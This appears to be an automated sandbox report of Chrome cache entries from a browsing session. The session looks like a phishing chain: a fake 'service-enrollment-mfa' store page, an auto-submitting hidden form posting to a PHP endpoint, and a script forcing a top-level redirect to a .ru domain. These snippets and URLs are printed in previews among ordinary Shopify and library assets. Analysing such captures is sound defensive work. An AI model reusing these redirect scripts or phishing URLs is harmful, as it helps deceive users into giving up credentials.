URL:	https://55db36-5b.myshopify.com/cdn/shop/t/1/assets/constants.js?v=132983761750457495441723734290
Preview:	const ON_CHANGE_DEBOUNCE_TIMER = 300;..const PUB_SUB_EVENTS = {. cartUpdate: 'cart-update',. quantityUpdate: 'quantity-update',. optionValueSelectionChange: 'option-value-selection-change',. variantChange: 'variant-change',. cartError: 'cart-error',.};.

Chrome Cache Entry: 124

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	1249
Entropy (8bit):	5.242453121762845
Encrypted:	false
SSDEEP:
MD5:	F58515DFE987F7E027C8A71BBC884621
SHA1:	BEC6AEBF5940EA88FBBFF5748D539453D49FA284
SHA-256:	679E7E62B81267C93D0778083AE0FD0EFE24172FF0AC581835B54165B3D9ED43
SHA-512:	F085346A38318F7935D76909DB0367862924CC9B0D96256F7FF4E8999C041E610BBCDE8CA56C92673BDE0991C85E9C9D9B6726ABD91D0C3177462C80D4A99140
Malicious:	false
Reputation:	unknown
URL:	https://welshpoolsharkspnu.ru/favicon.ico
Preview:	<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.<title> 404 Not Found..</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>.<h2 style="margin-top:20px;font-size: 30px;">Not Found..</h2>.<p>The resource requested could not be found on this server!</p>.</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px

Chrome Cache Entry: 127

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	XML 1.0 document, ASCII text
Category:	downloaded
Size (bytes):	243
Entropy (8bit):	5.608078333562955
Encrypted:	false
SSDEEP:
MD5:	D3991EC58E9457CC2567F7B76184CE9B
SHA1:	61540140E4000190A47239EB9CABA35C74C129F7
SHA-256:	5617E34F7716486474987D79E5D01E08C2179EEB98C6EFE43A0D4A8AE6EEBC4B
SHA-512:	1A3766E276B85620372CD307570FDEBDF33E3D4E72D37C92616FFE85319104ED19BB98A597725145AE4B8E09CA8A009320E25922DA724D5B8E0C0B5825E9F4B7
Malicious:	false
Reputation:	unknown
URL:	https://deverechemicals3.s3.amazonaws.com/checkouts/internal/preloads.js?locale=en-US
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2BM5QW7HX7Z6V5F2</RequestId><HostId>5QRAlqAXSFl0fp92zPeWURUEkoxsWx9OQ9t/GfCZyJdZfi8lNDpmk9ns5QuyZqJ3yuDFXMLYkew=</HostId></Error>

Chrome Cache Entry: 130

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	XML 1.0 document, ASCII text
Category:	downloaded
Size (bytes):	243
Entropy (8bit):	5.608808289811635
Encrypted:	false
SSDEEP:
MD5:	CD793AC67EF3D6A0A68CC0D4A553E275
SHA1:	D825E96DA3AC4D218163BDA4DBA5C82CC9CDC6F8
SHA-256:	9020BA859F02DD4C618C9EC7305821513EBC480C0CC4E11FB24A4DA760543EE7
SHA-512:	571AD668128A600F45FD5A3696BF2629890FDB252AF9D3992087353E076C95368F5401C74EB9E90DCCB31CC97EA5F46326DD11D30CF3F72047CEBDD19EA8E7F5
Malicious:	false
Reputation:	unknown
URL:	https://deverechemicals3.s3.amazonaws.com/favicon.ico
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5HBENNGZASVHACW6</RequestId><HostId>WZYOiRSmyW8DxdX9Lg87eVpwZaTTunkNO26lRTMzGhTKh7LA07CUtjKcHCyM9wkzOWaiDkLMaho=</HostId></Error>

Chrome Cache Entry: 133

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	XML 1.0 document, ASCII text
Category:	downloaded
Size (bytes):	243
Entropy (8bit):	5.5559702997475835
Encrypted:	false
SSDEEP:
MD5:	F6F1214CA4CAA64039DE98AA7081D775
SHA1:	F04DFF2F9841A3135E7C7C075FD8B107B08E1E8A
SHA-256:	A3CF7081C171BC9B73B61326CC7A805A9EB87A2AE7FAA457FBC97F4CA1A937B8
SHA-512:	56A0207B0AC39BCDCD574BFCF1CC996751FF385F27149135B5ABC6856828D3D4546A8B76E5692C4BFEAF667EB7DAB27A6E0577E0C712FAFF4F55BA46C77C388E
Malicious:	false
Reputation:	unknown
URL:	https://deverechemicals3.s3.amazonaws.com/wpm@5d08cde3w4f259957pd2db89ecm09d01778/custom/web-pixel-shopify-custom-pixel@0142/sandbox/modern/Deveres3project002files.htm
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>Q9ZZ684QVYXATSSV</RequestId><HostId>1Z5ryiR+gN/qPKLcdgxFPPCECNQYqHe3BDxcgKSbKAbd/A/vBOUDDG//ffpgkaSNeTbwnXQyA4g=</HostId></Error>

Chrome Cache Entry: 136

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (6127), with CRLF line terminators
Category:	downloaded
Size (bytes):	55466
Entropy (8bit):	5.531461908279042
Encrypted:	false
SSDEEP:
MD5:	086228B2AB1EF352B48BE03A6845C507
SHA1:	88034FF5E722FCE7AD223F5C06517FD017CF2852
SHA-256:	9A0596E3E11C63CBDEC7A4895BC7431C696F8E8C33934BA8829F97B105AEBDEB
SHA-512:	0D5FAE00F8EF0456E3843EE04C6FE52F984BB6926A4D4E87543562EA03B607C65E4AE708534F663170456A5730013DD186803BCF66604F8DBAB88606D114F9EB
Malicious:	false
Reputation:	unknown
URL:	https://deverechemicals3.s3.amazonaws.com/Deveres3project002files.htm
Preview:	..<html class="js" lang="en">.. <head>.. <meta charset="utf-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width,initial-scale=1">.. <meta name="theme-color" content="">.. <link rel="canonical" href="https://55db36-5b.myshopify.com/pages/service-enrollment-mfa"><link rel="preconnect" href="https://fonts.shopifycdn.com" crossorigin><title>.. service-enrollment-mf\]=[-pi07654321 .. – My Store</title>.... .... ....<meta property="og:site_name" content="My Store">..<meta property="og:url" content="https://55db36-5b.myshopify.com/pages/service-enrollment-mfa">..<meta property="og:title" content="service-enrollment-mfa">..<meta property="og:type" content="website">..<meta property="og:description" content="My Store"><meta name="twitter:card" content="summary_large_image">..<meta name="twitter:title" content="service-enrollment-mfa">..<meta name="twitter:description" content="My Store">...... <scri

Chrome Cache Entry: 139

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (4635)
Category:	downloaded
Size (bytes):	4743
Entropy (8bit):	4.952942826830459
Encrypted:	false
SSDEEP:
MD5:	577A77B11D24558505D61C922E42E008
SHA1:	1B47CD4C4CD660090533573487FF9C16036F4E64
SHA-256:	F74A1CFA61F4EBDCAB4703D2EB9F1140C01C6C3A7734BF63C64708FC26624705
SHA-512:	6631CC99349CB1933356B6A1F9EEB6759A361862A498D933AD1F1C6A822490C9CE2E001FC666EC95573865135DD27ED40BBF0CF97E63242C37FE74D053AFE052
Malicious:	false
Reputation:	unknown
URL:	https://55db36-5b.myshopify.com/cdn/shop/t/1/assets/component-cart-items.css?v=127384614032664249911723734289
Preview:	cart-items .title-wrapper-with-link{margin-top:0}.cart-items td,.cart-items th{padding:0;border:none}.cart-items th{text-align:left;padding-bottom:1.8rem;opacity:.85;font-weight:400}.cart-item__quantity-wrapper{display:flex}.cart-item__totals{position:relative}.cart-items .right{text-align:right}.cart-item__image-container{display:inline-flex;align-items:flex-start}.cart-item__image-container:after{content:none}.cart-item__image{height:auto;max-width:calc(10rem / var(--font-body-scale))}@media screen and (min-width: 750px){.cart-item__image{max-width:100%}}.cart-item__details{font-size:1.6rem;line-height:calc(1 + .4 / var(--font-body-scale))}.cart-item__details>{margin:0;max-width:30rem}.cart-item__details>+{margin-top:.6rem}.cart-item__media{position:relative}.cart-item__link{display:block;bottom:0;left:0;position:absolute;right:0;top:0;width:100%;height:100%}.cart-item__name{text-decoration:none;display:block}.cart-item__name:hover{text-decoration:underline;text-underline-offset:

Chrome Cache Entry: 140

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65451)
Category:	dropped
Size (bytes):	88145
Entropy (8bit):	5.291106244832159
Encrypted:	false
SSDEEP:
MD5:	220AFD743D9E9643852E31A135A9F3AE
SHA1:	88523924351BAC0B5D560FE0C5781E2556E7693D
SHA-256:	0925E8AD7BD971391A8B1E98BE8E87A6971919EB5B60C196485941C3C1DF089A
SHA-512:	6E722FCE1E8553BE592B1A741972C7F5B7B0CDAFCE230E9D2D587D20283482881C96660682E4095A5F14DF45A96EC193A9B222030C53B1B7BBE8312B2EAE440D
Malicious:	false
Reputation:	unknown
Preview:	/! jQuery v3.4.1 \| (c) JS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e\|\|"function"==typeof e?n[o.call(e)]\|\|"object":typeof e}var

Chrome Cache Entry: 141

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (43130), with no line terminators
Category:	dropped
Size (bytes):	43132
Entropy (8bit):	5.377098086145285
Encrypted:	false
SSDEEP:
MD5:	72ACF605F8A08BA45A701354EA296FE4
SHA1:	1FBDD1369960FBFF9AA78979C72CFBAB3E4BFC2D
SHA-256:	8C3175502549C8C16538ACA3B25577159CB18191F3C7C22DB1382A592805FB74
SHA-512:	14F1C6760FEC9C7D30E1D8FB7895092DD8499EFFBC216DA524814FA6DD8C6908991AA96D7994F6C020F58EEAE8CCE09499868BBF35464387BC24D7F3A46E7B71
Malicious:	false
Reputation:	unknown
Preview:	!function(){"use strict";if(window.spWhatsAppIsScriptTagVersion=!1,document.querySelectorAll("script:not([src])").forEach((function(t){if(-1!==t.textContent.indexOf("function asyncLoad() {"))try{JSON.parse(t.textContent.split("var urls = ")[1].split("for (var i = 0; i < urls.length; i++) {")[0].replace("];","]")).forEach((function(t){-1!==t.indexOf("whatschat.shopiapps.in")&&(window.spWhatsAppIsScriptTagVersion=!0)}))}catch(t){}})),!0===window.spWhatsAppIsLoaded\|\|!0===window.spWhatsAppIsScriptTagVersion)return!1;window.spWhatsAppIsLoaded=!0;const t=Shopify.shop,e="/apps/sc",a="//shopiapps.in/whatsapp-share/script";var i,s,o,n;i="//ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js",o=function(){!function(i){if(!i\|\|"3.4.1"!=i.fn.jquery)return console.error("WhatsApp load failed! Because your jquery version is low or not supported"),!1;i(window);const s=i(document),o=i("body"),n=i("head");"class"in Array.prototype\|\|(String.prototype.class=function(){return"."+this}),"class"in Array

Chrome Cache Entry: 142

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (597)
Category:	downloaded
Size (bytes):	24886
Entropy (8bit):	5.029101530916286
Encrypted:	false
SSDEEP:
MD5:	049D6A1D41D6781D57D704CD1E729A00
SHA1:	2D2D8C02C99FEF3D33C162967CD141FF8ADD07E4
SHA-256:	A97D0C9ADBB74BDA23D33CFF4E7012246BEB55B66A26937B60C8416003792BFA
SHA-512:	2F625F26EC93353409B2F7EB153FC36C4DB36976591887E778AC47B9BC75FD08C70B49766C07F2C0C4EE3880AB580DF62F665C9DAACC17FBE1F24075AC730884
Malicious:	false
Reputation:	unknown
URL:	https://cdn.shopify.com/extensions/196b5c0a-f723-4efd-be3a-10cb00671e06/ctx-whatsapp-chat-marketing-21/assets/whatsapp-sharing.css
Preview:	.spk-whatsappchat-box , .spk-wsp-chat-btn , .spk-wsp-nft-text * {font-family: 'Poppins', sans-serif;-webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box;}..spk-whatsappchat-box :focus, .spk-wsp-chat-btn :focus, .spk-wsp-nft-text *:focus {outline: none;}..spk-whatsappchat-box {position: fixed;top: auto !important;right: 20px;bottom: 20px;width: 320px;background: #fff;border-radius: 25px;box-shadow: 0 3px 12px rgba(0,0,0,0.3);transition: all 0.3s ease;opacity: 0;visibility: hidden;overflow: hidden;-webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box;z-index: 9999999998;pointer-events: none;color: #333;}..spk-whatsappchat-box.chatbox-opened {opacity: 1;visibility: visible;pointer-events: auto;}..spk-whatsappchat-box .spk-chatbox-header {width: 100%;padding: 20px 20px 40px;background: #075E54;background-image: linear-gradient(160deg, #075E54 0%, #25D366 100%);position: relative;overflow: hidden;}..spk-whatsappchat-box .spk-chatb

Chrome Cache Entry: 145

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (8298), with no line terminators
Category:	downloaded
Size (bytes):	8298
Entropy (8bit):	5.180172095910542
Encrypted:	false
SSDEEP:
MD5:	125C7F6C7E3F3B32CA1A15AFBBC6935E
SHA1:	7066F246643259315FB97D3E85F48F4D471AB27E
SHA-256:	61FA9E0A912C675E178777D2B27F6CBD482F8912A6B0AA31FA3515985A8CD626
SHA-512:	15768054FE3D5EFEAD6DD96F73D54F3A935DDC246A8D727960371C543CFF923162C7530B8F47C4757F0A1028F9C0961DEE5D9D2FA983AE93434640C32F4A3020
Malicious:	false
Reputation:	unknown
URL:	https://55db36-5b.myshopify.com/cdn/shopifycloud/shopify/assets/shop_events_listener-61fa9e0a912c675e178777d2b27f6cbd482f8912a6b0aa31fa3515985a8cd626.js
Preview:	!function(){var e=function(e){var t={exports:{}};return e.call(t.exports,t,t.exports),t.exports},t=function(){function e(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable\|\|!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.key,r)}}return function(t,n,r){return n&&e(t.prototype,n),r&&e(t,r),t}}(),n=function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")},r=function(e){if(Array.isArray(e)){for(var t=0,n=Array(e.length);t<e.length;t++)n[t]=e[t];return n}return Array.from(e)};e((function(e,a){"use strict";function o(e,t){if(e.length!=t.length)throw Error("Payload body and response have different number of items");e.forEach((function(e,n){var r=1;try{r=parseInt(t[n].quantity,10)\|\|1}catch(e){console&&console.warn&&console.warn("[shop_events_listener] Error in handleBulkItemCartAddResponse: "+e.message)}s(e,r)}))}function i(e,t){for(var n=new Array(t),r=0;r<t;r++)n[r]={};var a=!0,o=!1,i=void 0;try{for(var c,s=dec

Chrome Cache Entry: 146

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (4864)
Category:	downloaded
Size (bytes):	4979
Entropy (8bit):	4.881464792359579
Encrypted:	false
SSDEEP:
MD5:	3BEB6B40D4C2C80FD264D56678A2F6E1
SHA1:	7E39AA9880F71ADE7BFFA9956680D6BAF37A87D9
SHA-256:	6EDEF8311D553C3AE2CAA39663EF61EB336CE7C7FBFBE93D1EFE0E0F6536EE83
SHA-512:	11EE599DEE3E1FEE9A3A2AFE1F5A704E62853A0BE9BCBA3C98102F0DDC5B71938EE6A79131F297129D29C0EE6DAFCC615684F57A9EC7169BFE8D76AA2BBF2830
Malicious:	false
Reputation:	unknown
URL:	https://55db36-5b.myshopify.com/cdn/shop/t/1/assets/component-predictive-search.css?v=118923337488134913561723734289
Preview:	.predictive-search{display:none;position:absolute;top:calc(100% + .1rem);left:-.1rem;border-width:var(--popup-border-width);border-style:solid;border-color:rgba(var(--color-foreground),var(--popup-border-opacity));background-color:rgb(var(--color-background));z-index:3;border-bottom-right-radius:var(--popup-corner-radius);border-bottom-left-radius:var(--popup-corner-radius);box-shadow:var(--popup-shadow-horizontal-offset) var(--popup-shadow-vertical-offset) var(--popup-shadow-blur-radius) rgba(var(--color-shadow),var(--popup-shadow-opacity));overflow-y:auto;-webkit-overflow-scrolling:touch}.predictive-search--search-template{z-index:2;width:calc(100% + .2rem)}.predictive-search__results-groups-wrapper{display:flex;border-bottom:.1rem solid rgba(var(--color-foreground),.08);padding-bottom:1rem}@media screen and (max-width: 749px){.predictive-search--header{right:0;left:0;top:100%}.predictive-search__results-groups-wrapper{flex-direction:column}.predictive-search__results-groups-wrapper:

Chrome Cache Entry: 147

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (14521)
Category:	dropped
Size (bytes):	14571
Entropy (8bit):	5.46737894370782
Encrypted:	false
SSDEEP:
MD5:	EF58D241272C9CFFD42F945CFBAFCC78
SHA1:	04C5BFCC3E2E08BF72EB448408287016B4A7DAE4
SHA-256:	C5B326E1B1417D29B28EB85FCA5289DA54578AF8B463FA0F2AA7512BE002FF4B
SHA-512:	331C9FB896B60F74BCBAE67645388870CA3D22FFAA372BFC0C77FAE39F8A41A07136EA89C85A6D5D79E348020CAD7373F723BADB9EE1EECC2D7B589136AD252E
Malicious:	false
Reputation:	unknown
Preview:	!function(e){"use strict";const n={TRACKING_ACCEPTED:"trackingConsentAccepted",TRACKING_DECLINED:"trackingConsentDeclined",MARKETING_ACCEPTED:"firstPartyMarketingConsentAccepted",SALE_OF_DATA_ACCEPTED:"thirdPartyMarketingConsentAccepted",ANALYTICS_ACCEPTED:"analyticsConsentAccepted",PREFERENCES_ACCEPTED:"preferencesConsentAccepted",MARKETING_DECLINED:"firstPartyMarketingConsentDeclined",SALE_OF_DATA_DECLINED:"thirdPartyMarketingConsentDeclined",ANALYTICS_DECLINED:"analyticsConsentDeclined",PREFERENCES_DECLINED:"preferencesConsentDeclined",CONSENT_COLLECTED:"visitorConsentCollected",CONSENT_TRACKING_API_LOADED:"consentTrackingApiLoaded"},t="2.1",o={ACCEPTED:"yes",DECLINED:"no",NO_INTERACTION:"no_interaction",NO_VALUE:""},r={NO_VALUE:"",ACCEPTED:"1",DECLINED:"0"},c={PREFERENCES:"p",ANALYTICS:"a",MARKETING:"m",SALE_OF_DATA:"t"},i={MARKETING:"m",ANALYTICS:"a",PREFERENCES:"p",SALE_OF_DATA:"s"},a={MARKETING:"marketing",ANALYTICS:"analytics",PREFERENCES:"preferences",SALE_OF_DATA:"sale_of_dat

Chrome Cache Entry: 149

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (45034)
Category:	downloaded
Size (bytes):	45035
Entropy (8bit):	5.400557193761079
Encrypted:	false
SSDEEP:
MD5:	C4D5335B2B69C6998EE34F5F7B3E246F
SHA1:	AF0AE01ECCEE153877976D5C7D6500AA9C380B60
SHA-256:	7EDA47B0C02C44BDAA43A5B14857F1257DDBD620B0397C32AA3AE8BAF769AB55
SHA-512:	1C62C5D29C56848C258701F2E6B39E2152A3CACEB2C96F19ADB8542FDCC233F42BD0FAE9D03C8EA04F6B4490D0B69FD24F62B6D18A14A31D87E24906CFC88C58
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/turnstile/v0/b/6790c32b9fc9/api.js
Preview:	"use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);function g(p){St(u,o,c,g,_,"next",p)}function _(p){St(u,o,c,g,_,"throw",p)}g(void 0)})}}function P(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):P(e,r)}function Oe(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Ce(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Oe(e,c,a[c])})}return e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

Chrome Cache Entry: 151

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	XML 1.0 document, ASCII text
Category:	downloaded
Size (bytes):	243
Entropy (8bit):	5.56342623465057
Encrypted:	false
SSDEEP:
MD5:	010ED5DDF2AAC248C549236B2159C6E7
SHA1:	4AAA9BDF09DABA7D9650A46A0EF8D94B9129E231
SHA-256:	C32A20B3228D0EB6DD81DA9A76DADB186979C5FFD2887006EA4BC3C6E04C45C4
SHA-512:	7960D5AC71975991FD6937AF738567EE8FF3DFEF3BBDD9E86CD696979D572EC9C2F4BB7953B59A8CEC71FD84C8C9DA4040B71DD84CD2E232870B659F651806A7
Malicious:	false
Reputation:	unknown
URL:	https://deverechemicals3.s3.amazonaws.com/cdn-cgi/challenge-platform/scripts/jsd/main.js
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5HB25V7CPC514HDY</RequestId><HostId>YQZY/ArAZI4wcnYblUvGgBQ65QgVdGqWKqiwTEQNDCdSGUf1Ep33Nu2V13h4/MZJUW2enJtCho0=</HostId></Error>

Chrome Cache Entry: 152

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (899)
Category:	dropped
Size (bytes):	994
Entropy (8bit):	5.05226621621051
Encrypted:	false
SSDEEP:
MD5:	F2368700F5E393B651B1853189E5C35B
SHA1:	5FA19C0A4AD7D72FA51332B98E412290B6DAEB0D
SHA-256:	905699EB270A7FEF34EF5C99E3E7576ECA9A3D8D3D54D93435E4A9050FA1B16F
SHA-512:	A2BB139D617E0CBC7B53608CF823F631DC9A03E8BD82F530AD0941C1854DBB1212DE216823DB9C65981BC641590FE1B3A745EE1FB7510FFCE071685EE9BA5E2B
Malicious:	false
Reputation:	unknown
Preview:	class SearchForm extends HTMLElement{constructor(){super(),this.input=this.querySelector('input[type="search"]'),this.resetButton=this.querySelector('button[type="reset"]'),this.input&&(this.input.form.addEventListener("reset",this.onFormReset.bind(this)),this.input.addEventListener("input",debounce(event=>{this.onChange(event)},300).bind(this)))}toggleResetButton(){const resetIsHidden=this.resetButton.classList.contains("hidden");this.input.value.length>0&&resetIsHidden?this.resetButton.classList.remove("hidden"):this.input.value.length===0&&!resetIsHidden&&this.resetButton.classList.add("hidden")}onChange(){this.toggleResetButton()}shouldResetForm(){return!document.querySelector('[aria-selected="true"] a')}onFormReset(event){event.preventDefault(),this.shouldResetForm()&&(this.input.value="",this.input.focus(),this.toggleResetButton())}}customElements.define("search-form",SearchForm);.//# sourceMappingURL=/cdn/shop/t/1/assets/search-form.js.map?v=133129549252120666541723734290.

Chrome Cache Entry: 154

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	298
Entropy (8bit):	5.236176488333468
Encrypted:	false
SSDEEP:
MD5:	213D93A7DBEEE27D7D125C501EDD96CC
SHA1:	2CAE63F320E66FCFA2373F929FA4B80E1038BD21
SHA-256:	5361762D9D7DEE5D24183B38376583F97BCA263B34D03BB0D199AFB5636BC04D
SHA-512:	580E2902846763D34C9D3065F46066F28E33910E060AE9F0E672C334FA06F800C6A28A9EBB6418A9E8A3B7B2702BCA9F467E879B973A64593B41BFEEEEE660AB
Malicious:	false
Reputation:	unknown
URL:	https://50ou-vasil-levski.com/tvavx.php?7-797967704b53693230746376543830707a696a497a7765536955585a78515635705870467066702b5257354f52766f41-
Preview:	<form method="POST" action="https://50ou-vasil-levski.com/tvavx.php"><input type="hidden" name="cod" value="797967704b53693230746376543830707a696a497a7765536955585a78515635705870467066702b5257354f52766f41"><input type="hidden" name="e" value=""></form>..<script>document.forms[0].submit();</script>

Chrome Cache Entry: 155

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	61
Entropy (8bit):	3.990210155325004
Encrypted:	false
SSDEEP:
MD5:	9246CCA8FC3C00F50035F28E9F6B7F7D
SHA1:	3AA538440F70873B574F40CD793060F53EC17A5D
SHA-256:	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
SHA-512:	A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
Preview:	.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 156

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	85
Entropy (8bit):	4.6896489890232855
Encrypted:	false
SSDEEP:
MD5:	3EABA5DC3C93F1ED729A586BA9E700BA
SHA1:	FC81EF0CE3D36BC328E982BFF5A421E6D9A438F8
SHA-256:	9EED1820E2E9738B1EAAC5C9E20B0C9F06888A86C5909FE17FFDC745DCBFA59C
SHA-512:	D43DEC4AD494C33A958D8C9A08183A44633D349D848FD22AAB97612CCBC482095409F56BD8493F378CF17FBC254BFD3421D36C352F5A9EF786EDDE18F278EA9B
Malicious:	false
Reputation:	unknown
URL:	https://50ou-vasil-levski.com/tvavx.php
Preview:	<script>window.top.location.href = "https://welshpoolsharkspnu.ru/NrFB2/#J";</script>

Chrome Cache Entry: 157

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4119
Entropy (8bit):	7.949120703870044
Encrypted:	false
SSDEEP:
MD5:	000BF649CC8F6BF27CFB04D1BCDCD3C7
SHA1:	D73D2F6D74EC6CDCBAE07955592962E77D8AE814
SHA-256:	6BDB369337AC2496761C6F063BFFEA0AA6A91D4662279C399071A468251F51F0
SHA-512:	73D2EA5FFC572C1AE73F37F8F0FF25E945AFEE8E077B6EE42CE969E575CDC2D8444F90848EA1CB4D1C9EE4BD725AEE2B4576AFC25F17D7295A90E1CBFE6EDFD5
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...P...P............IDATx..].xU...[..V..).Kk...V.k..J]jKEl?...t...!.{.,...E........@....F.%.....B...N.y..w.....I{.o...;.s..3...WH......./.zBp.o,XW.......#Z.f...\|mvD..9..F........y..o....1^.743l.......v..#.c.E&.e..hU1.{..........._cZ..We.v.....f.w....(..6\|.Y.. I:x..-.&.......D........<.6.6.l....T..)...\|....#..$g...VN.......!'/6.w..B.h.}....EV.......k.7" f.}.G.~#..M..+....G....iB......]..?+......'.j.GB..P%......\........../..%...&.8E...".........44.J...1.........S...........d.j..]ni%._..9.{.O?.H..6T.\|A.GC..g...U.oDEt,?.0....~....q=.y.~.9.Z......c...v.._....$.0.2...F.9a.L..)..l...2...w...I..&....Vg......H.I..r......./....z.`..+...Z.^U.=..5aBpb..0< ../>.9.c....".I..0.3N,}}....\|]Fb...Q.......W.....OQ..y;.....\|.37..}.....(c.....X..`xX).;......<5S....>.9..G.:..=..0^.......l_<G......H....C.O......Hk{..{....]Nc..B.8..}%>..w....Z...).....\..>....c..2...&..0'.DZJ.'~{Y....I....?........fR.a......;.<..lRG..n.....Q......Nf.6.

Chrome Cache Entry: 159

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (47992), with no line terminators
Category:	downloaded
Size (bytes):	47992
Entropy (8bit):	5.605846858683577
Encrypted:	false
SSDEEP:
MD5:	CF3402D7483B127DED4069D651EA4A22
SHA1:	BDE186152457CACF9C35477B5BDDA5BCB56B1F45
SHA-256:	EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
SHA-512:	9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
Malicious:	false
Reputation:	unknown
URL:	https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
